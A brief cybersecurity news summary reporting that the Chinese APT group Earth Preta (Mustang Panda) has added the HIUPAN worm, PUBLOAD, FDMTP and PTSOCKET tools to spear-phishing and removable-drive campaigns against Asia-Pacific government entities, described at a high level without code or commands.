TLDR:
Earth Preta (Mustang Panda) hackers, a sophisticated Chinese APT group, have added new tools to their cyberattack arsenal, including HIUPAN worm and PUBLOAD malware. They now target government entities in the Asia-Pacific region using spear-phishing tactics. This multi-stage attack includes tools like FDMTP, PTSOCKET, and uses exfiltration methods like cURL to FTP sites. The group’s evolving tactics and evasion techniques pose a significant threat.
Earth Preta Hackers Added New Tools To Their Arsenal
Earth Preta, also known as Mustang Panda, Bronze President, RedDelta, and Red Lich, is a Chinese APT group targeting government entities globally but focusing on the Asia-Pacific region. Recently, they have added new tools to their cyberattack strategy, including the HIUPAN worm to disseminate PUBLOAD malware through removable drives. The group uses tools like FDMTP for malware downloading and PTSOCKET for exfiltration. Their campaign begins with spear-phishing emails with .url attachments triggering a multi-stage malware deployment process. The attacks target specific files with extensions like .doc, .xls, and .pdf. The evolving tactics and sophisticated evasion techniques of Earth Preta pose a significant threat to various sectors.